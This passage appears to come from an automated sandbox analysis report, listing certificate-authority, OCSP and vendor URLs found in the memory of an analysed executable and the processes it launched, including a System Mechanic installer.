Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 